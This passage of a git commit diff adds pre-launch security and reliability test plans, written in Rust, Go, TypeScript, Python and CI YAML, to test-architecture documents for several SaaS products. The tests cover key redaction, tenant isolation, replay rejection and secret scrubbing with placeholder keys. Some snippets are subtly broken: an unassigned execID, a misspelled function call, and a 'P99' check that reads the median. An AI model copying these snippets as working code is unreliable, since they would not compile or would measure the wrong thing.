Implement BMad Must-Have Before Launch fixes for all 6 products

P1: API key redaction, SSE billing leak, token math edge cases, CI runner config P2: mTLS revocation lockout, terraform state lock recovery, RLS pool leak, entropy scrubber, pgmq visibility P3: HMAC replay prevention, cross-tenant negative tests, correlation window edge cases, SQS claim-check, free tier P4: Discovery partial failure recovery, ownership conflict integration test, VCR freshness CI, Meilisearch rebuild, Cmd+K latency P5: Concurrent baseline conflicts, remediation RBAC, Clock interface for governance, 10K property-based runs, Redis panic fallback P6: Cryptographic agent update signatures, streaming audit logs with WAL, shell AST parsing (mvdan/sh), intervention deadlock TTL, canary suite CI gate
2026-03-01 02:14:04 +00:00
parent b24cfa7c0d
commit d038cd9c5c
6 changed files with 1305 additions and 0 deletions
--- a/products/01-llm-cost-router/test-architecture/test-architecture.md
+++ b/products/01-llm-cost-router/test-architecture/test-architecture.md
@@ -2551,3 +2551,167 @@ async fn panic_mode_allowed_for_owner_role() {
 ```

 *End of P1 Review Remediation Addendum*
+
+---
+
+## 12. BMad Review Implementation (Must-Have Before Launch)
+
+### 12.1 API Key Redaction in Panic Traces
+
+```rust
+// tests/security/key_redaction_test.rs
+
+#[test]
+fn panic_handler_redacts_bearer_tokens_from_stack_trace() {
+    // Simulate a panic inside the proxy handler while processing a request
+    // with Authorization: Bearer sk-live-abc123
+    let result = std::panic::catch_unwind(|| {
+        process_request_with_panic("Bearer sk-live-abc123");
+    });
+    assert!(result.is_err());
+    
+    // Capture the panic message
+    let panic_msg = get_last_panic_message();
+    assert!(!panic_msg.contains("sk-live-abc123"),
+        "Panic trace contains raw API key!");
+    assert!(panic_msg.contains("[REDACTED]") || !panic_msg.contains("sk-"));
+}
+
+#[test]
+fn error_log_redacts_provider_api_keys() {
+    // Simulate an upstream error that includes the provider key in the response
+    let error_body = r#"{"error": "Invalid API key: sk-proj-abc123xyz"}"#;
+    let sanitized = redact_sensitive_fields(error_body);
+    assert!(!sanitized.contains("sk-proj-abc123xyz"));
+}
+
+#[test]
+fn telemetry_event_never_contains_raw_api_key() {
+    let event = create_telemetry_event("Bearer sk-live-secret", "gpt-4o", 100, 50);
+    let serialized = serde_json::to_string(&event).unwrap();
+    assert!(!serialized.contains("sk-live-secret"));
+    assert!(!serialized.contains("Bearer"));
+}
+```
+
+### 12.2 SSE Billing Leak Prevention (Expanded)
+
+```rust
+#[tokio::test]
+async fn sse_disconnect_bills_only_streamed_tokens() {
+    let stack = E2EStack::start().await;
+    let mock = stack.mock_provider();
+    
+    // Provider will stream 100 tokens at 1/sec
+    mock.configure_slow_stream(100, Duration::from_millis(100));
+    
+    // Client reads 10 tokens then disconnects
+    let mut stream = stack.proxy_stream(&chat_request_streaming()).await;
+    let mut received = 0;
+    while let Some(chunk) = stream.next().await {
+        received += count_tokens_in_chunk(&chunk);
+        if received >= 10 { break; }
+    }
+    drop(stream);
+    
+    tokio::time::sleep(Duration::from_millis(500)).await;
+    
+    // Billing must reflect only streamed tokens
+    let usage = stack.get_last_usage_record().await;
+    assert!(usage.completion_tokens <= 15, // small buffer for in-flight
+        "Billed {} tokens but only streamed ~10", usage.completion_tokens);
+    
+    // Provider connection must be aborted
+    assert_eq!(mock.active_connections(), 0);
+}
+
+#[tokio::test]
+async fn sse_disconnect_during_prompt_processing_bills_zero_completion() {
+    // Client disconnects before any completion tokens are generated
+    // (provider is still processing the prompt)
+    let stack = E2EStack::start().await;
+    let mock = stack.mock_provider();
+    mock.configure_delay_before_first_token(Duration::from_secs(5));
+    
+    let stream = stack.proxy_stream(&chat_request_streaming()).await;
+    tokio::time::sleep(Duration::from_millis(100)).await;
+    drop(stream); // Disconnect before first token
+    
+    let usage = stack.get_last_usage_record().await;
+    assert_eq!(usage.completion_tokens, 0);
+    // Prompt tokens may still be billed (provider processed them)
+}
+```
+
+### 12.3 Token Calculation Edge Cases
+
+```rust
+#[test]
+fn tokenizer_handles_unicode_emoji_correctly() {
+    // cl100k_base tokenizes emoji differently than ASCII
+    let text = "Hello 🌍🔥 world";
+    let tokens = count_tokens_cl100k(text);
+    assert!(tokens > 3); // Emoji take multiple tokens
+}
+
+#[test]
+fn tokenizer_handles_cjk_characters() {
+    let text = "你好世界";
+    let tokens = count_tokens_cl100k(text);
+    assert!(tokens >= 4); // Each CJK char is typically 1+ tokens
+}
+
+#[test]
+fn cost_calculation_matches_provider_billing() {
+    // Property test: our token count * rate must match what the provider reports
+    // within a 1% tolerance (tokenizer version differences)
+    fc::assert(fc::property(
+        fc::string_of(fc::any::<char>(), 1..1000),
+        |text| {
+            let our_count = count_tokens_cl100k(&text);
+            let provider_count = mock_provider_token_count(&text);
+            let diff = (our_count as f64 - provider_count as f64).abs();
+            diff / provider_count as f64 <= 0.01
+        }
+    ));
+}
+
+#[test]
+fn anthropic_tokenizer_differs_from_openai() {
+    // Same text, different token counts — billing must use the correct tokenizer
+    let text = "The quick brown fox jumps over the lazy dog";
+    let openai_tokens = count_tokens_cl100k(text);
+    let anthropic_tokens = count_tokens_claude(text);
+    // They WILL differ — verify we use the right one per provider
+    assert_ne!(openai_tokens, anthropic_tokens);
+}
+```
+
+### 12.4 Dedicated CI Runner for Latency Benchmarks
+
+```yaml
+# .github/workflows/benchmark.yml
+# Runs on self-hosted runner (Brian's NAS) — not shared GitHub Actions
+name: Latency Benchmark
+on:
+  push:
+    branches: [main]
+    paths: ['src/proxy/**']
+
+jobs:
+  benchmark:
+    runs-on: self-hosted  # Brian's NAS with consistent CPU
+    steps:
+      - uses: actions/checkout@v4
+      - name: Run proxy latency benchmark
+        run: cargo bench --bench proxy_latency
+      - name: Assert P99 < 5ms
+        run: |
+          P99=$(cat target/criterion/proxy_overhead/new/estimates.json | jq '.median.point_estimate')
+          if (( $(echo "$P99 > 5000000" | bc -l) )); then
+            echo "P99 latency ${P99}ns exceeds 5ms budget"
+            exit 1
+          fi
+```
+
+*End of P1 BMad Implementation*
--- a/products/02-iac-drift-detection/test-architecture/test-architecture.md
+++ b/products/02-iac-drift-detection/test-architecture/test-architecture.md
@@ -2094,3 +2094,208 @@ Per review recommendation, cap E2E at 10 critical paths. Remaining 40 tests push
 | E2E/Smoke | 10% (~50) | 7% (~35) | Capped at 10 true E2E + 25 Playwright UI tests |

 *End of P2 Review Remediation Addendum*
+
+---
+
+## 12. BMad Review Implementation (Must-Have Before Launch)
+
+### 12.1 mTLS Revocation — Instant Lockout
+
+```go
+// tests/integration/mtls_revocation_test.go
+
+func TestRevokedCert_ExistingConnectionDropped(t *testing.T) {
+    // 1. Agent connects with valid cert
+    agent := connectAgentWithCert(t, validCert)
+    assert.True(t, agent.IsConnected())
+    
+    // 2. Revoke the cert via CRL update
+    revokeCert(t, validCert.SerialNumber)
+    
+    // 3. Force CRL refresh on SaaS (< 30 seconds)
+    triggerCRLRefresh(t)
+    
+    // 4. Existing connection must be terminated
+    time.Sleep(5 * time.Second)
+    assert.False(t, agent.IsConnected(),
+        "Revoked agent still has active mTLS connection — cached session not cleared")
+}
+
+func TestRevokedCert_NewConnectionRejected(t *testing.T) {
+    revokeCert(t, validCert.SerialNumber)
+    triggerCRLRefresh(t)
+    
+    _, err := connectAgentWithCert(t, validCert)
+    assert.Error(t, err)
+    assert.Contains(t, err.Error(), "certificate revoked")
+}
+
+func TestPayloadReplay_RejectedByNonce(t *testing.T) {
+    // Capture a legitimate drift report
+    report := captureValidDriftReport(t)
+    
+    // Replay it
+    resp := postDriftReport(t, report)
+    assert.Equal(t, 409, resp.StatusCode) // Conflict — nonce already used
+}
+```
+
+### 12.2 Terraform State Lock Recovery on Panic
+
+```go
+// tests/integration/remediation_panic_test.go
+
+func TestPanicMode_ReleasesTerraformStateLock(t *testing.T) {
+    // 1. Start a remediation (terraform apply)
+    execID := startRemediation(t, "stack-1", "drift-1")
+    waitForState(t, execID, "applying")
+    
+    // 2. Verify state lock is held
+    lockInfo := getTerraformStateLock(t, "stack-1")
+    assert.NotNil(t, lockInfo, "State lock should be held during apply")
+    
+    // 3. Trigger panic mode
+    triggerPanicMode(t)
+    
+    // 4. Wait for agent to abort
+    waitForState(t, execID, "aborted")
+    
+    // 5. State lock MUST be released
+    lockInfo = getTerraformStateLock(t, "stack-1")
+    assert.Nil(t, lockInfo,
+        "Terraform state lock not released after panic — infrastructure is now in zombie state")
+}
+
+func TestPanicMode_AgentRunsTerraformForceUnlock(t *testing.T) {
+    // If normal unlock fails, agent must run `terraform force-unlock`
+    startRemediation(t, "stack-1", "drift-1")
+    waitForState(t, execID, "applying")
+    
+    // Simulate lock that can't be released normally
+    corruptStateLock(t, "stack-1")
+    triggerPanicMode(t)
+    
+    // Agent should attempt force-unlock
+    logs := getAgentLogs(t)
+    assert.Contains(t, logs, "terraform force-unlock")
+}
+```
+
+### 12.3 RLS Connection Pool Leak Test
+
+```go
+// tests/integration/rls_pool_leak_test.go
+
+func TestPgBouncer_ClearsTenantContext_BetweenRequests(t *testing.T) {
+    t.Parallel()
+    
+    // 1. Request as Tenant A — sets SET LOCAL app.tenant_id = 'tenant-a'
+    respA := apiRequest(t, tenantAToken, "GET", "/v1/stacks")
+    assert.Equal(t, 200, respA.StatusCode)
+    stacksA := parseStacks(respA)
+    
+    // 2. Immediately request as Tenant B on same PgBouncer connection
+    respB := apiRequest(t, tenantBToken, "GET", "/v1/stacks")
+    assert.Equal(t, 200, respB.StatusCode)
+    stacksB := parseStacks(respB)
+    
+    // 3. Tenant B must NOT see Tenant A's stacks
+    for _, stack := range stacksB {
+        assert.NotEqual(t, "tenant-a", stack.TenantID,
+            "CRITICAL: Tenant B received Tenant A's data — PgBouncer leaked context")
+    }
+}
+
+func TestRLS_100ConcurrentTenants_NoLeakage(t *testing.T) {
+    // Stress test: 100 concurrent requests from different tenants
+    var wg sync.WaitGroup
+    violations := make(chan string, 100)
+    
+    for i := 0; i < 100; i++ {
+        wg.Add(1)
+        go func(tenantID string) {
+            defer wg.Done()
+            token := createTenantToken(t, tenantID)
+            resp := apiRequest(t, token, "GET", "/v1/stacks")
+            stacks := parseStacks(resp)
+            for _, s := range stacks {
+                if s.TenantID != tenantID {
+                    violations <- fmt.Sprintf("Tenant %s saw data from %s", tenantID, s.TenantID)
+                }
+            }
+        }(fmt.Sprintf("tenant-%d", i))
+    }
+    wg.Wait()
+    close(violations)
+    
+    for v := range violations {
+        t.Fatal("CROSS-TENANT LEAK:", v)
+    }
+}
+```
+
+### 12.4 Secret Scrubber Entropy Scanning
+
+```go
+// pkg/agent/scrubber/entropy_test.go
+
+func TestEntropyScan_DetectsBase64EncodedAWSKey(t *testing.T) {
+    // AWS key base64-encoded inside a JSON block
+    input := `{"config": "` + base64.StdEncoding.EncodeToString([]byte("AKIAIOSFODNN7EXAMPLE")) + `"}`
+    result := scrubber.Scrub(input)
+    assert.NotContains(t, result, "AKIAIOSFODNN7EXAMPLE")
+}
+
+func TestEntropyScan_DetectsMultiLineRSAKey(t *testing.T) {
+    input := `-----BEGIN RSA PRIVATE KEY-----
+MIIEpAIBAAKCAQEA0Z3VS5JJcds3xfn/ygWyF8PbnGy5AhJPnUfGqlTlGa...
+-----END RSA PRIVATE KEY-----`
+    result := scrubber.Scrub(input)
+    assert.Contains(t, result, "[REDACTED RSA KEY]")
+}
+
+func TestEntropyScan_DetectsHighEntropyCustomToken(t *testing.T) {
+    // 40-char hex string that looks like a custom API token
+    token := "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0"
+    input := fmt.Sprintf(`{"api_token": "%s"}`, token)
+    result := scrubber.Scrub(input)
+    // Shannon entropy > 3.5 bits/char should trigger redaction
+    assert.NotContains(t, result, token)
+}
+
+func TestEntropyScan_DoesNotRedactNormalText(t *testing.T) {
+    input := `{"message": "Hello world, this is a normal log message"}`
+    result := scrubber.Scrub(input)
+    assert.Equal(t, input, result) // No false positives
+}
+```
+
+### 12.5 pgmq Visibility Timeout for Long Scans
+
+```go
+// tests/integration/pgmq_visibility_test.go
+
+func TestPgmq_LongScan_DoesNotTriggerDuplicateProcessing(t *testing.T) {
+    // Simulate a scan that takes 5 minutes
+    queue := setupPgmqQueue(t)
+    
+    // Enqueue a drift report
+    queue.Send(t, makeDriftReport("stack-1"))
+    
+    // Consumer 1 picks it up with 2-minute visibility timeout
+    msg := queue.Read(t, 120) // 120s visibility
+    assert.NotNil(t, msg)
+    
+    // Simulate long processing (extend visibility)
+    for i := 0; i < 3; i++ {
+        time.Sleep(90 * time.Second)
+        queue.ExtendVisibility(t, msg.ID, 120) // Extend by another 2 min
+    }
+    
+    // Consumer 2 should NOT get the same message
+    msg2 := queue.Read(t, 120)
+    assert.Nil(t, msg2, "pgmq handed job to second worker while first was still processing")
+}
+```
+
+*End of P2 BMad Implementation*
--- a/products/03-alert-intelligence/test-architecture/test-architecture.md
+++ b/products/03-alert-intelligence/test-architecture/test-architecture.md
@@ -1865,3 +1865,227 @@ describe('Slack Notification Circuit Breaker', () => {
 | E2E | 10% (~20) | 10% (~28) | Dashboard UI (Playwright), onboarding flow |

 *End of P3 Review Remediation Addendum*
+
+---
+
+## 12. BMad Review Implementation (Must-Have Before Launch)
+
+### 12.1 HMAC Timestamp Freshness (Replay Attack Prevention)
+
+```typescript
+describe('HMAC Replay Attack Prevention', () => {
+  it('rejects Datadog webhook with timestamp older than 5 minutes', async () => {
+    const payload = makeDatadogPayload();
+    const staleTimestamp = Math.floor(Date.now() / 1000) - 301; // 5min + 1s
+    const sig = computeDatadogHMAC(payload, staleTimestamp);
+    
+    const resp = await ingest(payload, {
+      'dd-webhook-timestamp': staleTimestamp.toString(),
+      'dd-webhook-signature': sig,
+    });
+    expect(resp.status).toBe(401);
+    expect(resp.body.error).toContain('stale timestamp');
+  });
+
+  it('rejects PagerDuty webhook with missing timestamp', async () => {
+    const payload = makePagerDutyPayload();
+    const sig = computePagerDutyHMAC(payload);
+    
+    const resp = await ingest(payload, {
+      'x-pagerduty-signature': sig,
+      // No timestamp header
+    });
+    expect(resp.status).toBe(401);
+  });
+
+  it('rejects OpsGenie webhook replayed after 5 minutes', async () => {
+    // OpsGenie doesn't always package timestamp cleanly
+    // Must extract from payload body and validate
+    const payload = makeOpsGeniePayload({ timestamp: fiveMinutesAgo() });
+    const sig = computeOpsGenieHMAC(payload);
+    
+    const resp = await ingest(payload, { 'x-opsgenie-signature': sig });
+    expect(resp.status).toBe(401);
+  });
+
+  it('accepts fresh webhook within 5-minute window', async () => {
+    const payload = makeDatadogPayload();
+    const freshTimestamp = Math.floor(Date.now() / 1000);
+    const sig = computeDatadogHMAC(payload, freshTimestamp);
+    
+    const resp = await ingest(payload, {
+      'dd-webhook-timestamp': freshTimestamp.toString(),
+      'dd-webhook-signature': sig,
+    });
+    expect(resp.status).toBe(200);
+  });
+});
+```
+
+### 12.2 Cross-Tenant Negative Isolation Tests
+
+```typescript
+describe('DynamoDB Tenant Isolation (Negative Tests)', () => {
+  it('Tenant A cannot read Tenant B incidents', async () => {
+    // Seed data for both tenants
+    await createIncident('tenant-a', { title: 'A incident' });
+    await createIncident('tenant-b', { title: 'B incident' });
+    
+    // Query as Tenant A
+    const results = await dao.listIncidents('tenant-a');
+    
+    // Explicitly assert Tenant B data is absent
+    const tenantIds = results.map(r => r.tenantId);
+    expect(tenantIds).not.toContain('tenant-b');
+    expect(results.every(r => r.tenantId === 'tenant-a')).toBe(true);
+  });
+
+  it('Tenant A cannot read Tenant B analytics', async () => {
+    await seedAnalytics('tenant-a', { alertCount: 100 });
+    await seedAnalytics('tenant-b', { alertCount: 200 });
+    
+    const analytics = await dao.getAnalytics('tenant-a');
+    expect(analytics.alertCount).toBe(100); // Not 300 (combined)
+  });
+
+  it('API returns 404 (not 403) for cross-tenant incident access', async () => {
+    const incident = await createIncident('tenant-b', { title: 'secret' });
+    
+    const resp = await api.get(`/v1/incidents/${incident.id}`)
+      .set('Authorization', `Bearer ${tenantAToken}`);
+    
+    // 404 not 403 — don't leak existence
+    expect(resp.status).toBe(404);
+  });
+});
+```
+
+### 12.3 Correlation Window Edge Cases
+
+```typescript
+describe('Out-of-Order Alert Delivery', () => {
+  it('late alert attaches to existing incident (not duplicate)', async () => {
+    const clock = new FakeClock();
+    const engine = new CorrelationEngine(new InMemoryWindowStore(), clock);
+    
+    // Alert 1 arrives at T=0
+    const alert1 = makeAlert({ service: 'auth', fingerprint: 'cpu-high', timestamp: 0 });
+    const incident1 = await engine.process(alert1);
+    
+    // Window closes at T=5min, incident shipped
+    clock.advanceBy(5 * 60 * 1000);
+    await engine.flushWindows();
+    
+    // Late alert arrives at T=6min with timestamp T=2min (within original window)
+    const lateAlert = makeAlert({ service: 'auth', fingerprint: 'cpu-high', timestamp: 2 * 60 * 1000 });
+    const result = await engine.process(lateAlert);
+    
+    // Must attach to existing incident, not create new one
+    expect(result.incidentId).toBe(incident1.incidentId);
+    expect(result.action).toBe('attached_to_existing');
+  });
+
+  it('very late alert (>2x window) creates new incident', async () => {
+    const clock = new FakeClock();
+    const engine = new CorrelationEngine(new InMemoryWindowStore(), clock);
+    
+    const alert1 = makeAlert({ service: 'auth', fingerprint: 'cpu-high' });
+    const incident1 = await engine.process(alert1);
+    
+    // 15 minutes later (3x the 5-min window)
+    clock.advanceBy(15 * 60 * 1000);
+    
+    const lateAlert = makeAlert({ service: 'auth', fingerprint: 'cpu-high' });
+    const result = await engine.process(lateAlert);
+    
+    expect(result.incidentId).not.toBe(incident1.incidentId);
+    expect(result.action).toBe('new_incident');
+  });
+});
+```
+
+### 12.4 SQS Claim-Check Round-Trip
+
+```typescript
+describe('SQS 256KB Claim-Check End-to-End', () => {
+  it('large payload round-trips through S3 pointer', async () => {
+    const largePayload = makeLargeAlertPayload(300 * 1024); // 300KB
+    
+    // Ingestion compresses and stores in S3
+    const resp = await ingest(largePayload);
+    expect(resp.status).toBe(200);
+    
+    // SQS message contains S3 pointer
+    const sqsMsg = await getLastSQSMessage(localstack, 'alert-queue');
+    const body = JSON.parse(sqsMsg.Body);
+    expect(body.s3Pointer).toBeDefined();
+    
+    // Correlation engine fetches from S3 and processes
+    const incident = await waitForIncidentCreated(5000);
+    expect(incident).toBeDefined();
+    expect(incident.sourceAlertCount).toBeGreaterThan(0);
+  });
+
+  it('S3 fetch timeout does not crash correlation engine', async () => {
+    // Inject S3 latency (10 second delay)
+    mockS3.setLatency(10000);
+    
+    const largePayload = makeLargeAlertPayload(300 * 1024);
+    await ingest(largePayload);
+    
+    // Correlation engine should timeout and send to DLQ
+    const dlqMsg = await getDLQMessage(localstack, 'alert-dlq', 15000);
+    expect(dlqMsg).toBeDefined();
+    
+    // Engine is still healthy
+    const health = await api.get('/health');
+    expect(health.status).toBe(200);
+  });
+});
+```
+
+### 12.5 Free Tier Enforcement
+
+```typescript
+describe('Free Tier (10K alerts/month, 7-day retention)', () => {
+  it('accepts alert at 9,999 count', async () => {
+    await setAlertCounter('tenant-free', 9999);
+    const resp = await ingestAsTenat('tenant-free', makeAlert());
+    expect(resp.status).toBe(200);
+  });
+
+  it('rejects alert at 10,001 with upgrade prompt', async () => {
+    await setAlertCounter('tenant-free', 10000);
+    const resp = await ingestAsTenant('tenant-free', makeAlert());
+    expect(resp.status).toBe(429);
+    expect(resp.body.upgrade_url).toContain('stripe');
+  });
+
+  it('counter resets on first of month', async () => {
+    await setAlertCounter('tenant-free', 10000);
+    clock.advanceToFirstOfNextMonth();
+    await runMonthlyReset();
+    
+    const resp = await ingestAsTenant('tenant-free', makeAlert());
+    expect(resp.status).toBe(200);
+  });
+
+  it('purges data older than 7 days on free tier', async () => {
+    await createIncident('tenant-free', { createdAt: eightDaysAgo() });
+    await runRetentionPurge();
+    
+    const incidents = await dao.listIncidents('tenant-free');
+    expect(incidents).toHaveLength(0);
+  });
+
+  it('retains data for 90 days on pro tier', async () => {
+    await createIncident('tenant-pro', { createdAt: thirtyDaysAgo() });
+    await runRetentionPurge();
+    
+    const incidents = await dao.listIncidents('tenant-pro');
+    expect(incidents).toHaveLength(1);
+  });
+});
+```
+
+*End of P3 BMad Implementation*
--- a/products/04-lightweight-idp/test-architecture/test-architecture.md
+++ b/products/04-lightweight-idp/test-architecture/test-architecture.md
@@ -1265,3 +1265,225 @@ def test_meilisearch_index_rebuild_does_not_drop_search():
    # Verify zero-downtime index swapping during mapping updates
    pass
 ```
+
+---
+
+## 12. BMad Review Implementation (Must-Have Before Launch)
+
+### 12.1 Discovery Scan Timeout / Partial Failure Recovery
+
+```python
+# tests/integration/test_discovery_resilience.py
+
+def test_partial_aws_scan_does_not_delete_existing_services():
+    """If AWS scanner times out after discovering 500 of 1000 resources,
+    existing catalog entries must NOT be marked stale or deleted."""
+    
+    # Seed catalog with 1000 services
+    seed_catalog(count=1000)
+    
+    # Simulate scanner timeout after 500 resources
+    with mock_aws_timeout_after(500):
+        result = run_aws_discovery_scan()
+    
+    assert result.status == "partial_failure"
+    assert result.discovered == 500
+    
+    # All 1000 services must still exist in catalog
+    services = catalog_api.list_services()
+    assert len(services) == 1000  # NOT 500
+    
+    # Partial results should be staged, not committed
+    staged = catalog_api.list_staged_updates()
+    assert len(staged) == 500
+
+def test_partial_github_scan_does_not_corrupt_ownership():
+    """If GitHub scanner hits rate limit mid-scan, existing ownership
+    mappings must be preserved."""
+    
+    seed_catalog_with_ownership(count=100)
+    
+    with mock_github_rate_limit_after(50):
+        result = run_github_discovery_scan()
+    
+    assert result.status == "partial_failure"
+    
+    # All 100 ownership mappings intact
+    services = catalog_api.list_services()
+    owned = [s for s in services if s.owner is not None]
+    assert len(owned) == 100  # NOT 50
+
+def test_scan_failure_triggers_alert_not_silent_failure():
+    result = run_aws_discovery_scan_with_invalid_credentials()
+    assert result.status == "failed"
+    
+    # Must alert the admin
+    alerts = get_admin_alerts()
+    assert any("discovery scan failed" in a.message for a in alerts)
+```
+
+### 12.2 Ownership Conflict Resolution Integration Test
+
+```python
+# tests/integration/test_ownership_conflict.py
+
+def test_explicit_config_overrides_implicit_tag():
+    """Explicit (CODEOWNERS/config) > Implicit (AWS tags) > Heuristic (commits)"""
+    
+    # AWS tag says owner is "team-infra"
+    aws_scanner.discover_service("auth-api", owner_tag="team-infra")
+    
+    # GitHub CODEOWNERS says owner is "team-platform"
+    github_scanner.discover_service("auth-api", codeowners="team-platform")
+    
+    # Resolve conflict
+    service = catalog_api.get_service("auth-api")
+    assert service.owner == "team-platform"  # Explicit wins
+    assert service.owner_source == "codeowners"
+
+def test_concurrent_discovery_sources_do_not_race():
+    """Two scanners discovering the same service simultaneously
+    must not create duplicate entries."""
+    
+    import asyncio
+    
+    async def run_both():
+        await asyncio.gather(
+            aws_scanner.discover_service_async("billing-api"),
+            github_scanner.discover_service_async("billing-api"),
+        )
+    
+    asyncio.run(run_both())
+    
+    services = catalog_api.search("billing-api")
+    assert len(services) == 1  # No duplicates
+
+def test_heuristic_ownership_does_not_override_explicit():
+    # Explicit owner set via config
+    catalog_api.set_owner("auth-api", "team-platform", source="config")
+    
+    # Heuristic scanner infers different owner from commit history
+    github_scanner.infer_ownership("auth-api", top_committer="dev@other-team.com")
+    
+    service = catalog_api.get_service("auth-api")
+    assert service.owner == "team-platform"  # Explicit preserved
+```
+
+### 12.3 VCR Cassette Freshness Validation
+
+```yaml
+# .github/workflows/vcr-refresh.yml
+# Weekly job to re-record VCR cassettes against real AWS
+name: VCR Cassette Freshness
+on:
+  schedule:
+    - cron: '0 6 * * 1'  # Every Monday 6 AM UTC
+
+jobs:
+  refresh:
+    runs-on: self-hosted
+    steps:
+      - uses: actions/checkout@v4
+      - name: Re-record cassettes
+        env:
+          AWS_ACCESS_KEY_ID: ${{ secrets.VCR_AWS_KEY }}
+          AWS_SECRET_ACCESS_KEY: ${{ secrets.VCR_AWS_SECRET }}
+        run: |
+          VCR_RECORD=all pytest tests/integration/scanners/ -v
+      - name: Diff cassettes
+        run: |
+          git diff --stat tests/cassettes/
+          CHANGED=$(git diff --name-only tests/cassettes/ | wc -l)
+          if [ "$CHANGED" -gt 0 ]; then
+            echo "⚠️ $CHANGED cassettes changed — AWS API responses have drifted"
+            echo "Review and commit updated cassettes"
+          fi
+      - name: Create PR if cassettes changed
+        uses: peter-evans/create-pull-request@v6
+        with:
+          title: "chore: refresh VCR cassettes (AWS API drift)"
+          branch: vcr-refresh
+```
+
+### 12.4 Meilisearch Zero-Downtime Index Rebuild
+
+```python
+# tests/integration/test_meilisearch_rebuild.py
+
+def test_search_returns_results_during_index_rebuild():
+    """Cmd+K search must work during index rebuild (zero downtime)."""
+    
+    # Seed index with 100 services
+    meili.index("services").add_documents(make_services(100))
+    meili.index("services").wait_for_pending_update()
+    
+    # Start rebuild (creates services_v2, swaps when ready)
+    rebuild_task = start_index_rebuild()
+    
+    # Search must still work during rebuild
+    results = meili.index("services").search("auth")
+    assert len(results["hits"]) > 0
+    
+    # Wait for rebuild to complete
+    rebuild_task.wait()
+    
+    # Search still works after swap
+    results = meili.index("services").search("auth")
+    assert len(results["hits"]) > 0
+
+def test_index_rebuild_failure_does_not_corrupt_active_index():
+    meili.index("services").add_documents(make_services(50))
+    
+    # Simulate rebuild failure (e.g., OOM during indexing)
+    with mock_meili_oom_during_rebuild():
+        result = start_index_rebuild()
+    
+    assert result.status == "failed"
+    
+    # Active index must be untouched
+    results = meili.index("services").search("billing")
+    assert len(results["hits"]) > 0  # Still works
+```
+
+### 12.5 Cmd+K Search Latency from Redis Cache
+
+```python
+# tests/performance/test_search_latency.py
+
+def test_cmd_k_search_under_10ms_from_redis():
+    """Prefix cache hit must return in <10ms."""
+    
+    # Warm the cache
+    redis_client.set("search:prefix:auth", json.dumps([
+        {"name": "auth-service", "owner": "team-platform"},
+        {"name": "auth-proxy", "owner": "team-infra"},
+    ]))
+    
+    import time
+    start = time.perf_counter_ns()
+    results = search_api.prefix_search("auth")
+    elapsed_ms = (time.perf_counter_ns() - start) / 1_000_000
+    
+    assert elapsed_ms < 10, f"Cmd+K search took {elapsed_ms:.1f}ms — exceeds 10ms SLA"
+    assert len(results) == 2
+```
+
+### 12.6 Free Tier Enforcement (50 Services)
+
+```python
+def test_free_tier_allows_50_services():
+    tenant = create_tenant(tier="free")
+    for i in range(50):
+        resp = catalog_api.create_service(tenant, f"service-{i}")
+        assert resp.status_code == 201
+
+def test_free_tier_rejects_51st_service():
+    tenant = create_tenant(tier="free")
+    seed_services(tenant, count=50)
+    
+    resp = catalog_api.create_service(tenant, "service-51")
+    assert resp.status_code == 403
+    assert "upgrade" in resp.json()["error"].lower()
+```
+
+*End of P4 BMad Implementation*
--- a/products/05-aws-cost-anomaly/test-architecture/test-architecture.md
+++ b/products/05-aws-cost-anomaly/test-architecture/test-architecture.md
@@ -710,3 +710,198 @@ export const makeBaseline = (overrides) => ({
   - CDK definitions, LocalStack event injection, wire everything together.

 *End of dd0c/cost Test Architecture (v2)*
+
+---
+
+## 12. BMad Review Implementation (Must-Have Before Launch)
+
+### 12.1 Concurrent Baseline Update Conflict Test
+
+```typescript
+describe('Concurrent Baseline Updates (DynamoDB TransactWriteItem)', () => {
+  it('two simultaneous Lambda invocations converge to correct baseline', async () => {
+    // Seed baseline: mean=1.00, stddev=0.10, count=20
+    await seedBaseline('tenant-1', 'ec2/m5.xlarge', { mean: 1.00, stddev: 0.10, count: 20 });
+    
+    // Two events arrive simultaneously for the same resource type
+    const event1 = makeCostEvent({ hourlyCost: 1.50 });
+    const event2 = makeCostEvent({ hourlyCost: 2.00 });
+    
+    // Process concurrently
+    const [result1, result2] = await Promise.allSettled([
+      processEvent('tenant-1', 'ec2/m5.xlarge', event1),
+      processEvent('tenant-1', 'ec2/m5.xlarge', event2),
+    ]);
+    
+    // One succeeds, one retries via ConditionalCheckFailed
+    const successes = [result1, result2].filter(r => r.status === 'fulfilled');
+    expect(successes.length).toBe(2); // Both eventually succeed
+    
+    // Final baseline must reflect BOTH events
+    const baseline = await getBaseline('tenant-1', 'ec2/m5.xlarge');
+    expect(baseline.count).toBe(22); // 20 + 2
+    // Mean should be updated by both observations (order doesn't matter for Welford)
+  });
+
+  it('ConditionalCheckFailed triggers retry with fresh baseline read', async () => {
+    const spy = vi.spyOn(dynamoClient, 'transactWriteItems');
+    
+    // Force a conflict on first attempt
+    mockConflictOnce();
+    
+    await processEvent('tenant-1', 'ec2/m5.xlarge', makeCostEvent({ hourlyCost: 3.00 }));
+    
+    // Should have been called twice (initial + retry)
+    expect(spy).toHaveBeenCalledTimes(2);
+  });
+});
+```
+
+### 12.2 Remediation RBAC
+
+```typescript
+describe('Remediation Authorization', () => {
+  it('only account owners can click Stop Instance', async () => {
+    const ownerAction = makeSlackAction('stop_instance', { userId: 'U_OWNER' });
+    const resp = await handleSlackAction(ownerAction);
+    expect(resp.status).toBe(200);
+  });
+
+  it('viewer role cannot trigger remediation', async () => {
+    const viewerAction = makeSlackAction('stop_instance', { userId: 'U_VIEWER' });
+    const resp = await handleSlackAction(viewerAction);
+    expect(resp.status).toBe(403);
+    expect(resp.body.error).toContain('insufficient permissions');
+  });
+
+  it('user from different Slack workspace cannot trigger remediation', async () => {
+    const foreignAction = makeSlackAction('stop_instance', { 
+      userId: 'U_FOREIGN', 
+      teamId: 'T_OTHER_WORKSPACE' 
+    });
+    const resp = await handleSlackAction(foreignAction);
+    expect(resp.status).toBe(403);
+  });
+
+  it('snooze and mark-expected are allowed for all authenticated users', async () => {
+    const viewerSnooze = makeSlackAction('snooze_24h', { userId: 'U_VIEWER' });
+    const resp = await handleSlackAction(viewerSnooze);
+    expect(resp.status).toBe(200);
+  });
+});
+```
+
+### 12.3 Clock Interface for Governance Tests
+
+```typescript
+// src/governance/clock.ts
+interface Clock {
+  now(): number;
+  advanceBy(ms: number): void;
+}
+
+class FakeClock implements Clock {
+  private current: number;
+  constructor(start = Date.now()) { this.current = start; }
